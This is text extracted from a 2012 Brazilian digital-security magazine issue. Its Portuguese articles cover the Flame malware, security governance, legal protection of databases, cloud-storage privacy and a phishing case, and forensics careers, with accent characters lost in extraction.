Graduado em Cincia da Computao e MBA em Gesto Empresarial pela FGV, iniciou a carreira como especialista em sistema operacional Solaris e infraestrutura de redes. Ao longo de 13 anos de experincia agregou conhecimentos de segurana e operao de Data Center. Atualmente Gerente de Operaes de Data Center de uma das maiores Autoridades Certificadoras Brasileiras. Email: leonardo.pereira.guimaraes@gmail.com Twitter: @leoguimainfo.
Figura 2 - O conhecimento o caminho.
Caber ao gestor, tambm de posse desse mapa, acionar a alta diretoria da empresa com o planeja mento de treinamento para todos os seus funcionrios designando assim os devidos conhecimentos para ca da funcionrio de forma que todas as reas de conhe cimento tcnico estejam completas. Da para frente, a difuso de conhecimento passa a acontecer interna
|25
Flame: novo captulo de uma guerra ciberntica?
ma empresa russa, especialista em segurana vir tual, identificou um novo e altamente potente malware espio, o Flame. Para os peritos no as sunto, mais que um malware, o Flame faz parte de uma operao de ciberespionagem bem coordenada, estatal e em curso desde meados de 2007.
Free Digital Photos.
A empresa responsvel pela descoberta foi categ rica ao afirmar que h envolvimento de pases na cri ao do programa que infectou computadores iranianos. Para os especialistas, por trs do desenvol
vimento do super vrus, esto agncias americanas e israelenses que teriam firmado pareceria de forma cooperativa. Essa informao foi divulgada em matrias recen tes dos jornais americanos The New York Times e Washington Post. Segundo as reportagens, o Flame tem como objetivo coletar informaes e dados sobre o funcionamento das redes de computadores irania nas, visando facilitar ataques futuros, sobretudo no programa nuclear do Ir. Os jornais citaram fontes oficiais desconhecidas, o que obrigou o FBI a iniciar investigaes internas para encontrar o foco dos vazamentos, alm de veri ficar se a divulgao de tais informaes tem fins meramente polticos, j que ano eleitoral nos Esta dos Unidos. Os representantes do Governo afirma ram que a exposio dessas notas pode ter colocado em risco o avano de projetos importantes para a se gurana nacional, bem como a vida de cidados. Embora esse malware, j responsvel por muita polmica, represente perigo em especial a mquinas corporativas, os internautas precisam se manter in formados a respeito do assunto, assim como se pro teger, j que h grandes probabilidades de surgirem riscos para computadores de uso pessoal. Por isso, a equipe da Bitdefender preparou esse artigo, com algumas informaes importantes a res
|26
peito do assunto. Vejamos.
Seu computador corre risco

A comparao com o Stutnex automtica e ne cessria, assim como marcar as diferenas. preciso notar que enquanto o Stutnex foi criado para danifi car infraestruturas muito especficas, como a de uma usina nuclear, o Flame foi projetado para ser verstil e capaz de infectar diferentes perfis. Ou seja, o Stutnex tinha o objetivo especfico de atacar redes e grandes empresas, enquanto o Flame pode se infiltrar em computadores de uso pessoal, para roubar dados de um funcionrio pblico, por exemplo.
Flame
Assim foi nomeado o malware que maior do que o Stutnex programa que sabotou a infraestrutura do programa nuclear iraniano. O Flame tem composio, complexidade e prop sito diferente do seu antecessor. Seu principal dife rencial o longo alcance geogrfico e seu comportamento. O malware possui todas as caracte rsticas de uma ciberarma. Embora tenham um programador diferente, mui to provvel que haja a ligao entre o desenvolvi mento de ambos os malwares.
Como se proteger?
A melhor maneira de se proteger diante dessas ameaas ser cauteloso, sendo imperativo manter um antivrus sempre atualizado. Outra possibilidade recorrer ferramenta da Bitdefender contra o Fla me. Como ainda no se sabe como o Falme atinge uma mquina, cautela e proteo nunca so exageros. O malware possui cerca de 20 mdulos, que so ins talados passo a passo por cibercriminosos. Por isso, a qualquer sinal de invaso, preciso tomar providn cias. Uma pista valiosa para descobrir se uma mqui na est contaminada por um Flame o desaparecimento repentino de informaes e dados. Por enquanto, esse nico rastro que o malware dei xa no computador, alm de seus diversos mdulos que ficam gravados em diferentes locais do disco. Por isso, a ferramenta da Bitdefender pode ser muito til, pois, com ela, possvel detectar a pre sena do malware em uma mquina, removendoo imediatamente. Ademais, cuidados de rotinas continuam valendo. Manter uma conduta inteligente ao usar um compu tador imprescindvel. Nesse sentido, de extrema importncia no clicar em links suspeitos, no insta lar programas piratas, fazer apenas downloads segu ros e evitar alteraes no sistemas, sem conhecimento prvio, por exemplo. Esses malwares, ao que tudo indica, so os pri meiros, mas dificilmente sero os ltimos ou nicos. Isso porque a guerra ciberntica para defender e ata car interesses empresariais e estatais real. Assim, investir em segurana a palavra de ordem dos no vos tempos da internet. Este artigo um oferecimento Bitdefender para a Revista Segurana Digital da
Maneira de atuao
O Flame foi projetado para espionar os computa dores infectados por meio do roubo de dados, que in clui as conversaes gravadas, teclas pressionadas e os documentos arquivados. Quando instalado em um computador, o malware permite modificaes e alte raes nos sistemas do aparelho, como a incluso de novas funcionalidades, mesmo que o cibercriminoso no tenha acesso fsico mquina. A complexidade e poder de infeco do Flame permite que ele grave conversas realizadas por Sky pe, roube dados de aparelhos com Bluetooth ligado nas proximidades, alm dos histricos de navegao. Extremamente sofisticado, esse malware demorou mais tempo para ser descoberto, ao contrrio do Stut nex que por se multiplicar de maneira extremamente veloz deixou um rastro facilmente identificado.
Free Digital Photos.
|27
|0 |28
Janeiro 2012 segurancadigital.info Julho 2012 segurancadigital.info
A segurana da informao nunca esteve to em alta nas empresas como nos dias atuais. Entenda como sair na frente e se destacar no mercado
Governana da Segurana da Informao

A segurana da informao vem ganhando mais espao a cada dia entre os assuntos mais abordados dentro das empresas. Fatores como a alta exposio na mdia de incidentes ocorridos tanto com pessoas comuns quanto no meio empresarial e o medo gerado por no compreender a fundo sobre este novo campo que emerge como sendo de alto risco, caso no se adotem as devidas medidas de segurana, geram pre ocupaes cada vez maiores para os gestores e dire tores das empresas que estrategicamente se veem obrigados a acordar para esta nova realidade, pois ne cessitam que seus negcios atinjam seus objetivos com o menor risco possvel de perdas e possveis da nos sua imagem. H muito tempo que a segurana da informao no deve ser considerada apenas uma questo de fer ramentas e procedimentos tcnicos, mas um desafio com relao aos negcios como um todo e a gover nana da organizao, que envolve planejamento, de senvolvimento de polticas de segurana, auditoria, gesto de riscos adequada dentre outros, sendo que a participao de diretores e executivos de funda mental importncia visando o amparo necessrio para que tudo isto se torne possvel. A ideia central deste artigo mostrar um pouco deste panorama do alinhamento das necessidades de negcio segurana das informaes nas organiza
es, mostrando a importncia da Governana da Se gurana das Informaes nas empresas e como esta pode ser considerada de suma importncia para os negcios atualmente.
A governana nas empresas

O termo Governana est sendo muito discutido nestes ltimos tempos. De acordo com o IT Gover nance Institute ITGI, a Governana pode ser consi derada "um conjunto de responsabilidades e prticas exercidas pelos conselheiros e executivos com o ob jetivo de fornecer uma direo estratgica, assegu rando que os objetivos do negcio sejam alcanados, verificando se os riscos esto sendo administrados de maneira correta e se os recursos da empresa esto sendo utilizados de forma responsvel". Logo podemos perceber que se trata de uma "fer ramenta" muito interessante quando aplicada nas empresas, criando a chamada Governana Corporati va, que segundo o Instituto Brasileiro de Governana Corporativa IBGC "o sistema pelo qual as organi zaes so dirigidas, monitoradas e incentivadas, en volvendo os relacionamentos entre proprietrios, conselho de administrao, diretoria e rgos de con trole", proporcionando a gesto estratgica e o moni toramento das aes tomadas dentro das organizaes, coibindo abusos de poder, diminuindo
|29
os erros estratgicos, fraudes e promovendo o au mento da transparncia em sua gesto.
Governando a tecnologia da informao

A Governana da Tecnologia da Informao faz parte da Governana Corporativa. H muito tempo tecnologia da informao deixou de ser apenas uma rea meramente tcnica, de apoio ou suporte dentro das empresas. Na maioria delas, fator estratgico e decisrio em muitos momentos, necessitando para is so de estar alinhada com o que a empresa julga im portante e necessrio para seus negcios, para que esta possa ser o pilar de sustentao dos mesmos. So realizados muitos investimentos na rea de TI e esta deve corresponder altura, mas para tanto deve haver o alinhamento entre as metas de TI e as metas de negcio propostas pela empresa.
A G o v e r n a n a d a S e g u r a n a d a I n f o r m a o
Como dito, a segurana da informao j uma realidade para todos e motivo de grande preocupao nas empresas. Porm mesmo diante de tais preocupa es ainda de difcil compreenso por parte de dire tores e executivos quanto a sua real necessidade e os profissionais de segurana da informao se vm em uma situao em que cada vez mais precisam justifi car de todas as formas possveis que medidas, proce dimentos, processos e ferramentas propostas so definitivamente importantes e que aquilo ir propor cionar maior tranquilidade e garantias quanto aos ne gcios empresariais. Em muitas empresas vse ainda o pensamento de que j trabalho assim h muito tempo e nunca me aconteceu nada, por que agora de veremos investir nisso?!. Segundo o Centro de Estudos, Resposta e Trata mento de Incidentes de Segurana no Brasil CERT BR, a segurana da informao um termo relativa mente novo para a governana das organizaes. En tretanto, algumas aes para conscientizao do corpo diretor das empresas esto sendo tomadas, principalmente nos Estados Unidos, em virtude de crescentes ameaas financeiras e terroristas que o pas enfrenta. Est na hora de mudar um pouco a forma de pensar. A Governana da Segurana da Informao GSI, de acordo com o IGTI, pode ser considerada um sub conjunto da governana corporativa que fornece dire o estratgica, garantindo que os objetivos sejam alcanados, gerenciando os riscos de forma adequa
da, utilizando os recursos de forma responsvel e monitorando o fracasso e/ou sucesso do projeto de segurana dentro da empresa. A GSI deve ser parte integrante e transparente da governana corporativa e estar alinhada governana de TI, criando processos estruturados alinhados com a estratgia da empresa. No entanto, no basta apenas querer fazer com que as coisas aconteam. Tal necessidade deve ser compreendida por diretores e executivos e dever partir deles o pontap inicial para que a GSI possa se tornar vivel dentro da empresa. Se estes no estabe lecerem e reforarem as necessidades do negcio com o objetivo de se ter uma segurana empresarial efetiva, o estado de segurana desejado pela empresa no ser alcanado, uma vez que este um processo topdown altamente estratgico e diretamente ligado ao negcio da organizao, envolvendo todos os pro cessos organizacionais. Proteger informaes consi deradas crticas um fator de grande relevncia nestes processos e pode ser considerado um dos principais riscos a serem considerados, assim deve ser reconhecido como fator crucial para o sucesso. Uma boa governana da segurana da informao no fcil de ser alcanada. De fato muito mais simples propor a compra de uma soluo completa de segurana de qualquer tipo do que mudar a cultura das pessoas. O caminho rduo, mas prov muitos benefcios para os que se aventurarem neste campo e trabalharem duro, alm disso, com certeza ir consti tuir um diferencial competitivo para a organizao.
Colocando a GSI em prtica

de interesse de todos que a empresa alcance seus melhores resultados da maneira mais otimizada possvel, minimizando os riscos existentes nos pro cessos que so fundamentais para o negcio. Profis sionais de vrias escalas devem estar envolvidos nesta etapa e possuem objetivos a serem alcanados para o sucesso comum de todos. Caber a eles forne cer o amparo necessrio para que os outros colabora dores da organizao exeram seu melhor papel dentro do que foi estabelecido e alcancem os objeti vos especificados, assim como assegurar que tudo transcorra da melhor forma possvel. Logo abaixo podemos verificar mais caractersticas de alguns des tes profissionais estratgicos:
|30
Conselheiros Administrativos/Curadores Responsveis por proteger os interesses da orga nizao Devem compreender os riscos existentes e garan tir que estes sejam tradados a partir da perspecti va da governana Os resultados dependem diretamente do envolvi mento da alta administrao e estes devem estar comprometidos com a GSI Devem aprovar polticas e monitorar as mtricas estabelecidas para aferio dos resultados importante conhecerem os ativos de informa o e seu grau de criticidade perante o negcio da organizao, assim como validar quais sero pro tegidos e em quais nveis de proteo. Executivos Fornecem o apoio contnuo a GSI Envolvidos na definio dos objetivos estratgi cos de segurana So responsveis pelo cumprimento do que foi estabelecido por parte de seus colaboradores Planejamento de investimentos em segurana Participar no processo de integrao e cooperao dos gestores dos setores da empresa e processos relacionados Um resultado estratgico o alinhamento dos ob jetivos de segurana aos objetivos organizacio nais. Comit Gestor Garantem que todas as partes da organizao es tejam envolvidas com as questes de segurana da informao Podem fazer parte do comit: responsveis finan ceiros, CEOs (Chief Executive Officer), diretores de TI, CSOs (Chief security officer), CISOs Canal de comunicao eficaz que traduz os obje tivos da alta gesto garantindo o alinhamento do programa de segurana com os objetivos organi zacionais Fundamental para a mudana cultural, promoo de boas prticas de segurana garantidas pelo cumprimento das polticas implantadas. Chief Information Security Officer CISO
Possui autoridade e responsabilidades atribudas por seus superiores, demonstrando o compromis so firmado por gestores e diretores perante a se gurana da informao Podem ocupar cargos executivos, o que demons tra que a organizao consciente de sua depen dncia das informaes e as ameaas inerentes a elas Parte integrante direta do programa de segurana da informao Respondem pela segurana da informao em primeiro nvel Desenvolvimento e manuteno das estratgias de segurana da informao Criao de processos eficazes e eficientes.
Framework/Modelo para GSI

Para que a governana da segurana da informa o seja eficaz, devese estabelecer um framework ou modelo que ir guiar o desenvolvimento e manu teno do programa de segurana da informao. Segundo o ITGI, a formao deste modelo deve con sistir de: 1. Metodologia para gesto de riscos 2. Estratgia de segurana da informao relaci onada aos objetivos de negcios e tecnologia da informao 3. Estrutura de segurana organizacional eficaz 4. Estratgia de segurana que fala sobre o valor da informao protegida e disponibilizada 5. Polticas de segurana que abordam cada as pecto das estratgias adotadas, controles e regula mentaes 6. Conjunto de normas de segurana para cada poltica desenvolvida a fim de se garantir que os procedimentos e orientaes estejam em conformi dade com as polticas 7. Processos de monitoramento para garantir que tudo esteja em conformidade e fornecer feed back sobre a eficcia do projeto e mitigao dos riscos existentes 8. Processo para validao e atualizao peri dica das polticas de segurana, normas, procedi mentos, dentre outros. Uma exemplificao grfica deste modelo pode ser ilustrada como a seguir:
|31
De acordo com Francisco Temponi, este fra mework/modelo ir auxiliar a estratgia definida para negcio da organizao e consequentemente os obje tivos organizacionais, ficando clara a existncia do alinhamento estratgico, o relacionamento deste com a governana de TI e segurana da informao e a necessidade de sua validao nas empresas buscando assim a governana corporativa. Ainda completa que neste modelo, "[...] o Comit Diretor juntamente com o CISO, fundamentados no gerenciamento de riscos e na estratgia de segurana da informao, so os res ponsveis diretos pelo plano de ao de segurana e pelas polticas e padres a serem seguidos atravs de requisitos de segurana e de programas de seguran a."
Benefcios e resultados alcanados

notrio que todo o processo de elaborao e im plantao de um projeto de governana em segurana da no seja simples e fcil de ser realizado. Todavia, projetos como esse bem sucedidos apresentam gran des benefcios para toda a orgnaizao. Empresas que possuem este framework implementado possuem me nos incertezas quanto seus negcios, podem prever melhor situaes que podem colocar seu negcio em
risco e se preparar de antemo para possveis inci dentes, e, mesmo que estes venhem a ocorrer, pos suem planos de continuidade dos negcios que faro com que a organizao continue a funcionar de forma satisfatria ou se recupere no menor tempo possvel. Seus processos relacionados ao negcio sero oti mizados e haver uma melhor gesto dos riscos e dos dos recursos de segurana o que com certeza ir contribuir para o sucesso nas operaes do negcio. Tambm haver um tratamento adequado das infor maes, que passaro a ser mais confiveis e estrat gicas. Estas informaes agora devidamente geridas e protegidas se tornam um grande diferencial compe titivo perante seus concorrentes de mercado, forne cendo a devida garantia de que decises crticas no se baseiam em informaes incorretas ou manipula das. Com a GSI, as organizaes igualmente podem se sentir mais seguras quanto a informaes classifica das como crticas, de acesso restrito ou secreto, tais como informaes sobre possveis fuses ou lana mentos de novos produtos no mercado, pois estaro certas de que possuem o nvel de segurana adequa do quelas informaes e que estas esto sendo geri da da melhor e mais segura forma possvel, ficando
|32
tambm respaldadas contra possveis responsabilida de legais que podero incidir sobre a utilizao de in formaes errneas ou mesmo na ocorrncia de vazamento de informaes. Todos esses benefcios citados e reunidos talvez poderiam ser agrupadados em apenas uma frase que resumiria tudo o que foi dito: a boa governana da segurana das informaes promove um aumento significativo no valor agregado de seus produtos e servios, melhora a confiana dos clientes em relao
mesma e tambm aumenta a confiana na interao com outras empresas, protege sua imagem e a eleva a um patamar superior a de seus concorrentes, podendo haver um aumento significativo em suas aes, o que finalmente, ir levar a empresa a ter o retorno finan ceiro sempre almejado pelos gestores das organiza es quando o assunto investir em grandes projetos, justificando assim, o desenvolvimento da governana da segurana da informao.
Referncias Bibliogrficas
CERT BR. Centro de Estudos, Resposta e Tratamento de Incidentes de Segurana no Bra sil. Disponvel em: <http://www.cert.br/>. ECCOUNCIL. International Council of ECommerce Consultants. Disponvel em: <http://www.eccouncil.org>. TEMPONI, Francisco. Governana de Segurana da Informao. Universidade Fumec, 2011. IBGC. Instituto Brasileiro <http://www.ibgc.org.br>. de Governana Corporativa. Disponvel em:
ITGI. IT Governance Institute. Disponvel em: <http://www.itgi.org/>.
Thiago Fernandes Gaspar Caixeta
Graduado em Cincia da Computao e MBA em Gesto da Segurana da Infor mao pela Universidade Fumec, atua na rea de TI como Analista de Sistemas e Segurana da Informao. Entusiasta da forense computacional.
Email: thiago.caixeta@gmail.com Twitter: @tfgcaixeta
|33
Como demonstrar valor das aes de segurana para a empresa?

Resumo
O artigo visa clarificar sobre como a estratgia traada para uma empresa devem influenciar as aes e projetos de segurana da informao, exemplificando em um caso prtico de desdobra mento de metas, do nvel estratgico para o nvel ttico e operacional.. No exemplo citado no artigo, demonstramos co mo reportar corretamente que uma ao de controle de vulnerabilidades no ambiente, seja linkada a es tratgia da empresa, demonstrando o valor que essa ao traz.
Incio
Sempre me perguntei como podemos comprovar que segurana gera valor para empresa. uma per gunta que nos persegue diariamente, pois os profis sionais de segurana da informao tambm gostam de ter o seu trabalho reconhecido. Demonstrar o valor gerado pelas aes de segurana pode signifi car, e na maioria das vezes o que acontece, maior valorizao da rea e consequentemente maior in vestimento. Devido caracterstica altamente tcnica da pro fisso, muito fcil falar em tecnologia e inova es, porm no fcil demonstrar que essa
tecnologia trar os ganhos necessrios para os ob jetivos empresariais. Assim, a forma mais clara de demonstrar alinhando com os objetivos estratgi cos da companhia. O planejamento estratgico o que d a direo para o futuro da empresa. nele que so apontados os rumos da companhia e a partir dele que so transmitidos e ajustados todos os planejamentos, sejam financeiros, mercadolgicos, comunicao e tambm de tecnologia da informao. Esse proces so de transmisso da estratgia conhecido por desdobramento da estratgia. neste processo que cada uma das reas com ponentes da empresa, financeiro, marketing, admi nistrativo, controladoria, etc, alinhamse com os passos futuros da empresa, analisando como sero suas aes para que as metas estratgicas estabele cidas sejam alcanadas. E assim, no desdobramento da estratgia, deve ser claro o posicionamento do CSO Chief Secu rity Officer de que as aes para atingir os obje tivos o que iro nortear as atividades, aes, projetos e todo o conjunto de atividades da rea. Como exemplo, podemos exemplificar um desdo bramento da estratgia que gera uma ao de gesto de patchs:
|34
Ao olhar os objetivos estratgicos, conseguimos definir a ttica adotada para atingir aos mesmos. E dessa ttica, surgem as aes que sero feitas para cumprir a ttica traada. No caso, os objetivos estra tgicos geraram uma ao na rea de segurana da informao de combate a vulnerabilidades, que gerou aes operacionais de gesto de patchs e correes,
processo de desenvolvimento seguro, treinamento e capacitao em segurana da informao. Assim, ao demonstrarmos os resultados da ao ttica, facilmente conseguimos demonstrar o valor da ao, que esta atrelada aos objetivos estratgicos da empresa, sendo assim fcil mensurar e medir o su cesso das aes de segurana da informao:
|35
Com a mudana da postura empresarial depois das recentes crises financeiras mundiais, em que os pro cessos de controle de custos e gesto so mais rigoro sos, os esforos e recursos de segurana da informao devem ser cada vez mais justificados e geradores de valor real ao negcio da empresa e no mais apenas terem foco na evoluo da tecnologia e combate a novas ameaas.
Bibliografia:
1. David Menezes Lobato, Jamil Moyss Filho, Maria Candida Sotelino Torres, Murilo Ramos Alembert Rodrigues Estratgia de empresas, Editora FGV 2. KAPLAN, R.S.e NORTON, D.P. Organizao orientada para Estratgia: como as empresas que adotam o balanced scorecard prosperam no novo ambiente de negcios. Rio de Janeiro: Campus 2000 3. Porter, Michael E. (2001) "Strategy and the Internet", Harvard Business Review, March 2001
Eduardo Alves N. Da Silva

Eduardo Alves profissional de segurana da informao a 11 anos, atuando em gesto de projetos e equipes, operaes em SOC, planejamento, oramentao e estratgia, em empresas do segmento de telecom, energia e logstica. formando em engenharia da computao, com MBA em gesto empresarial pela FGV.
Twitter: @edu_alves_silva Linkedin: www.linkedin.com/in/edualves Email: eduardoalves19@gmail.com Blog/Site: www.edualves.com.br
|36
Os Meios Jurdicos De Proteo Dos Bancos De Dados: Uma Necessidade Estratgica De Negcio
A proteo jurdica dos bancos de dados, ou bases de dados, ganha relevncia diante da sua importncia perante a Sociedade da Informao. Nesse sentido, caracterizam investimentos que demandam meios ju rdicos eficientes de proteo.
Bancos de dados originais

Relativamente originalidade, a obra considera da original quando se trata de criao independente do autor e possua um mnimo de criatividade. Nesse sentido, no possvel reivindicar originali dade para simples fatos ou dados, que podem vir a formar o contedo de um banco de dados. Porm, re conhecese que bancos de dados podem atender ao requisito de originalidade em razo do critrio de se leo, organizao e disposio deste contedo no original. A Lei de Direitos Autorais brasileira (Lei 9610/98), em seu art. 7, XIII confere proteo jurdi ca s bases de dados que em razo do critrio adota do de seleo, organizao ou disposio do contedo, configuram criaes intelectuais. Ou seja, simples fatos no constituem material original passvel de proteo por direito autoral, mas uma compilao de fatos poder vir a ter proteo autoral se a seleo, organizao ou disposio do contedo for original. Essa proteo autoral implica
o reconhecimento de direitos patrimoniais exclusivos do autor da obra, no caso, do banco de dados. Atendendo especialidade constante no art. 87 da lei brasileira, o titular do direito patrimonial sobre a base de dados ter o direito exclusivo, a respeito da forma de expresso da estrutura da referida base, de autorizar ou proibir: A sua reproduo total ou parcial por qualquer meio ou processo A distribuio do original ou cpias da base de dados ou a sua comunicao ao pblico.
Bancos de dados no originais

Diante dos critrios do Direito Autoral para a concesso da proteo aos bancos de dados, temos que a grande maioria delas no preenchem tais re quisitos, obrigando os produtores a procurar outros meios efetivos de proteo jurdica do seu investi mento. Ressaltando que no Brasil no h previso legal para a proteo dos bancos de dados no originais, ainda que tenham sido feitos grandes investimentos na sua elaborao, resta portanto proteger os bancos de dados no originais atravs da Concorrncia Des leal, o que uma tentativa eficaz de evitar atos para sitrios daquele que comercializa o material
|37
disponvel no banco de dados, fazendo concorrncia em condies mais favorveis, uma vez que no fez os mesmos investimentos que o legtimo produtor.
o com a proteo dos investimentos realizados na elaborao dos mesmos, posto que hoje, os bancos de dados representam a espinha dorsal da Sociedade da Informao. Diante da realidade brasileira e a sua ausncia de meios jurdicos de proteo aos bancos de dados no originais, que configuram a grande maioria dos ban cos de dados, a melhor sada o investimento em mecanismos de segurana fsica e lgica destes ins trumentos to poderosos de informao.
No entanto, esta soluo no engloba atos que no configurem concorrncia direta, ou seja, a mera cpia do banco de dados ou at mesmo a sua utilizao em outra linha de negcio diferente da explorada pelo le gtimo produtor do banco de dados, no ensejariam nenhum mecanismo de proteo no Direito brasilei ro. H uma linha protecionista das bases de dados no originais que ficou conhecida como Teoria do Sweat of the Brow, aplicada no Reino Unido e na Ir landa, segundo a qual se entende que grandes investi mentos e esforos aplicados na elaborao de um banco de dados enseja a sua proteo jurdica, ainda que no seja reconhecida a originalidade. Para o sistema de proteo sueco, conhecido como Catalogue Rule, o grande investimento tambm era requisito de proteo, conforme podese extrair da leitura do art. 49 do Act on Copyright in Literary and Artistic Works de 1960. O direito conferido pelo re ferido diploma legal consiste num direito de exclusi vo quanto reproduo e comunicao ao pblico do respectivo catlogo. No mbito da Unio Europia, com a Diretiva 96/09/CE, a Diretiva Base de Dados, foi estabelecida uma nova forma de proteo jurdica das bases de da dos no originais, isto se deu atravs da criao de uma nova espcie de direito, o direito sui generis, que protege o investimento atravs do contedo do banco de dados no original. Observouse que diversos pases adotam mecanis mos diferenciados de proteo dos bancos de dados no originais, mas possuem em comum a preocupa
Ba
Lgia Barroso
Advogada, atuante em Direito Eletrnico e Propriedade Intelectual. Mestranda em Direito da Propriedade Intelectual na Uni versidade de Lisboa (FDUL), Especialista em Direito Eletrnico e Tecnologia da In formao pelo Centro Universitrio da Grande Dourados (UNIGRAN). Email: ligiabarroso@hotmail.com Twitter: @ligiaabarroso Julho 2012 segurancadigital.info
|38
nc
od
eD
ad
os
Figura 1 - Estrutura ilustrativa de uma base de dados.
Os Perigos dos Servios de Armazenamento de Dados na Nuvem
O crescimento do uso de armazenamento pessoal na nuvem uma realidade, porm o o uso deste recurso deve ser feito de forma segura e o usurio precisa estar consciente dos riscos
Introduo
Apesar do crescimento considervel dos servios de armazenamento de dados na nuvem como Drop Box, SkyDrive entre outros, existe uma srie de ris cos que muitos usurios no sabem sequer que estam correndo. O problema est nas configuraes de pri vacidade que a maioria dos usurios no se atenta alterar, deixando muito de seus documentos privados expostos para acesso pblico.
Problema 1 Privacidade
O que muita gente tambm no sabe que os me canismos de busca da Web (como o Google) indexam os arquivos localizado em sites de armazenamento. Veja no examplo abaixo uma simples pesquisa na Web com algumas palavras chave que podem levar a identificao de documentos com informaes priva das:
Figura 1 - Pesquisa no Google tendo como destino o site de armazenamento
|39
Veja que a mesma coisa acontece se o destino de consulta for alterado para o Google Docs:
Figura 2 - Consulta para documentos no Google Docs
possvel notar que existem documentos que por ventura contenham dados privados, porm por algum motivo o usurio deixou o documento exposto para acesso pblico. possvel que o usurio tenha deixa do visvel simplesmente pelo fato de no ter conheci mento que o mesmo seria compartilhado publicamente. Por este motivo de suma importncia revisar as configuraes de privacidade antes de compartilhar artigos publicamente. Lembrese: tudo indexado e descobrvel se for pblico. As recomen daes gerais independente do servio de armazena mento da nuvem que voc use so: Procure sempre ler as configuraes de privaci dade, entenda como funciona e como configurar de forma segura. Evite o compartilhamento de informaes pesso ais em pastas pblicas.
Assegure que as informaes que voc comparti lha em um servio de armazenamento na nuvem s podem ser acessadas por um usurio ou grupo de usurios. Leia as regras de privacidade gerais do provedor de servio de armazenamento na nuvem para enten der quais as responsabilidades dele e quais as suas.
Problema 2 Uso Malicioso

Recentemente recebi um email que estava prximo de ser encaminhado para o JunkMail do meu software de correio, era s uma questo de esperar alguns segundos que iria acontecer, porm achei o tipo de Phishing to tosco que resolvi ver o que era. Segue o email abaixo:
|40
A URL de destino aparece pois coloquei o pontei ro do mouse sobre o link, e claramente vi que era um link que redirecionava para outra localidade. Copiei o link, colei em uma estao de teste que tenho isola
da em um ambiente atrs de um Forefront TMG de teste que tambm est isolado da minha rede de pro duco. Ao colar o link no Browse notei o seguinte trfego no TMG:
Note que ele est sendo redirecionado para uma pasta do servio de armazenamento Dropbox, que por sua vez uma URL vlida e liberada pelo TMG. Com isso o trfego parece legtimo e sem levantar
suspeita. O servio de categorizao usado pelo TMG inclusive categoriza o mesmo como Personal Network Storage conforme mostrado abaixo:
O cliente por sua vez recebe a tela abaixo aparece:
Note que este nome no o nome do domnio e sim o nome do arquivo, a tentativa aqui ludibriar o usurio na tentativa de mostrar que tal arquivo de fa to est vendo de um site do governo.
Usando o IDA PRO fiz o disassembler deste ar quivo e vi que o mesmo foi construido usando Bor land Delphi:
|41
Tinha funes para verificao de espao em disco:
Faz algumas mudanas no registro, entre outras coisas que no vem ao caso para este artigo pois o fo co no fazer engenharia reversa e sim enfatizar os pontos sobre os servios de armazenamento na nu vem. possvel concluir com este tipo de ataque que: Phishing email continua sendo uma das portas de entrada favoritas de individuos que desejam ata car seu ambiente. Phishing email utiliza engenharia social para lu dibriar o usurio. O que significa que usurio sem treinamento bsico de segurana o alvo perfeito para este tipo de ataque. Servios vlidos da nuvem podem ser usados por usurios maliciosos para propagar malware, pois a URL passar pelo filtro de contedo como uma URL vlida. Tendo estes pontos em mente fique atento quanto as polticas de segurana do seu ambiente. Segurana em profundidade algo de suma importncia e um passo fundamental para proteger seu ambiente ter um treinamento bsico de conhecimentos gerais de segurana (Security Awareness Training) para educar o usurio que est lidando com os dados da sua em presa.
Yuri Diogenes
(CISSP, CASP, EC|CEH, E|CSA, CompTIA Cloud Essentials Certified, CompTIA Security+, Network+, Mi crosoft MCITP, MCTS, MCSA/MC SE+Security, MCSE+Internet, MCSA/MCSE+Messaging, membro da ISSA North Texas e da American Soci ety of Digital Forensics & eDiscovery). Mestrando em Cybersecurity Intelli gence and Forensics Investigation pela UTICA College nos Estados Unidos, autor de vrios livros na rea de segu rana da informao e ex membro do grupo de engenharia de suporte a pro dutos da linha Microsoft Forefront Ed ge Security. Atualmente Yuri trabalha no grupo Windows IT PRO Security da Microsoft. Yuri tambm escreve no seu blog em ingls. Em ingles: http://blogs.technet.com/yuridiogenes Em Portugus http://yuridiogenes.wordpress.com Twitter @yuridiogenes
Concluso
Neste artigo voc aprendeu um pouco sobre as questes relacionadas a segurana no uso de servios de armazenamento na nuvem. Entendeu que as ques tes de privacidade precisam ser endereadas antes mesmo de iniciar o uso do servio e tambm que o servio pode ser utilizado por usurios maliciosos pa ra armazenamento de malware.
|42
Perito Forense Computacional, Por Onde Comear?
orense computacional umas das reas da compu tao em fase de ascenso, podemos dizer, at por que em certos lugares ainda no possvel encontrar nenhuma espcie de formao na respectiva rea, mas por outro lado j est sendo bem difundida ulti mamente ao ser comparado h alguns anos atrs, devido pelo crescente uso de atividades ilcitas praticadas com uso da tecnologia digital, partindo disso a necessidade de profissionais capazes de investigar e produzir laudos peri ciais de como e por quem os fatos ocorreram.
Assim como em qualquer outra rea, o trabalho da pericia se faz imprescindvel no dia a dia, para dar respostas justamente a essas perguntas e ajudar nas resolues de crimes informticos. Aqui neste con texto o principal foco a surpreendente forense com putacional. Reconstruir o passado, constatar a materialida de e apurar a autoria de incidentes cometidos com o requinte dos bits. Esta a funo da forense di gital, carreira que mescla a formao jurdica com a tecnologia da informao e que crescente na esfera pblica e privada, medida em que confli tos, fraudes, furtos e agresses passam a ser co metidas por intermdio de dispositivos informticos e telemticos, de um computador de mesa a um dispositivo mvel celular.
Mas por onde devo comear para ser um perito no assunto? Primeiramente fazer um curso de graduao que envolva computao um fator primordial para tra balhar nesse campo de estudo. Resaltando que o pro fissional dessa esfera precisa ter amplos conhecimentos em segurana da informao, direito digital e sistemas em geral. Em seguida optar em ps graduao especifica no assunto, cursos e certi ficaes. E se tratando de careira promissora em ser vio pblico, uma tima opo o concurso da Policia Federal para perito criminal em computao. muito importante tambm se manter sempre atualizado como, por exemplo, est participando de eventos relacionados ao tema assim como publicando artigos, enfim est procurando crescer na profisso. Lembrese quanto mais visvel e qualificado, melhor profissional bem visto sers. Vejamos a seguir algumas informaes para co mear na caminhada da carreira profissional.
Certificaes
As certificaes mais vlidas no mercado mundial em softwares:
EnCE (EnCase Certified Examiner) ACE (AccessData Certified Examiner)
|43
Certificaes referentes a cursos, no Brasil e fora do pas:

CCFT (Certified Computer Forensic Technical) GIAC (Global Information Assurance Certification) CEH (Certified Ethical Hacker) CHFI (Certified Hacker Forensic Investigator) ACFEI (American College of Forensic Examiners Institute) DSO (Data Security Officer) DSFE (Data Security Forensics Examiner) DSLA (Data Security Leader Auditor)
Algumas empresas no Brasil onde se podem encontrar algumas dessas certificaes e treinamentos:
